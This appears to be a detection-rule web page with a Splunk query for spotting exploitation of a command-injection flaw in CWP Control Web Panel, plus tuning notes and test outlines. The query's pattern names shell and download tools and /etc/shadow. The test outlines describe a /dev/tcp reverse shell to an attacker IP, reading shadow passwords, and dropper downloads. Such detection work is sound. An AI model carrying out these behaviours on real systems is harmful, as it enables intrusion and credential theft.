CVE-2025-48703 Splunk · SPL

Detect CVE-2025-48703 - CWP Control Web Panel OS Command Injection in Splunk

Detects exploitation of CVE-2025-48703, an OS command injection vulnerability (CWE-78) in CWP Control Web Panel. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through the web panel interface, potentially leading to full server compromise.

MITRE ATT&CK

Tactic
Execution Persistence Privilege Escalation

SPL Detection Query

Splunk (SPL)
spl 
index=os OR index=web sourcetype=linux_audit OR sourcetype=syslog OR sourcetype=access_combined
| eval is_cwp_parent=if(match(parent_process, "httpd|apache2|nginx|cwpsrv|php-fpm|php"), 1, 0)
| eval is_suspicious_cmd=if(match(cmd, "id|whoami|uname|passwd|shadow|chmod|wget|curl|nc |ncat|socat|base64|/tmp/|/dev/shm"), 1, 0)
| eval is_cwp_path=if(match(_raw, "/usr/local/cwpsrv/|/opt/cwp/|cwp_api"), 1, 0)
| where (is_cwp_parent=1 AND is_suspicious_cmd=1) OR (is_cwp_path=1 AND is_suspicious_cmd=1)
| eval risk=case(
    match(cmd, "shadow|/dev/shm|base64|chmod 777"), "critical",
    match(cmd, "wget|curl|nc |ncat"), "high",
    true(), "medium")
| stats count, values(cmd) as commands, values(src_ip) as source_ips, earliest(_time) as first_seen, latest(_time) as last_seen by host, user, parent_process, risk
| where count > 0
| sort -risk, -count
critical severity medium confidence

Detects OS command injection exploitation in CWP Control Web Panel by identifying suspicious processes spawned from CWP web service parents. Aggregates by host and user to surface repeated injection attempts.

Data Sources

Linux AuditSyslogWeb Access Logs

Required Sourcetypes

linux_auditsyslogaccess_combined

False Positives & Tuning

  • Legitimate administrative shell commands issued through CWP terminal features
  • Automated backup or maintenance scripts running under the web server user
  • Penetration testing activity against the CWP host with prior authorization
  • CWP plugin or module execution that spawns helper processes

Other platforms for CVE-2025-48703

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1CWP Command Injection via API Parameter

    Expected signal: Linux audit log EXECVE event showing 'id' executed by the web server user (www-data/apache/cwp); web access log entry with URL-encoded semicolon in query parameter

  2. Test 2Reverse Shell Establishment Post-CWP Exploitation

    Expected signal: Process creation event for bash spawned by www-data user with -i flag and /dev/tcp redirect; outbound TCP connection to attacker IP on port 4444 from the CWP host

  3. Test 3Credential Harvesting via /etc/shadow Access

    Expected signal: Audit log showing www-data user attempting to read /etc/shadow; base64 encoding command in process arguments; file access event on /etc/shadow

  4. Test 4Dropper Download via Injected wget Command

    Expected signal: wget process spawned by www-data with external URL argument; outbound HTTP GET to attacker-controlled server; file creation event in /tmp by web service user; chmod execution on downloaded file

Last updated: 2026-06-19 Research depth: standard
References (3)

Unlock Pro Content

Get the full detection package for CVE-2025-48703 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Tactic Hubs

TA0002ExecutionTA0003PersistenceTA0004Privilege Escalation

Related Techniques

T1190Exploit Public-Facing ApplicationT1059Command and Scripting InterpreterT1003OS Credential DumpingT1133External Remote Services

Same Tactic: Execution

Popular Detections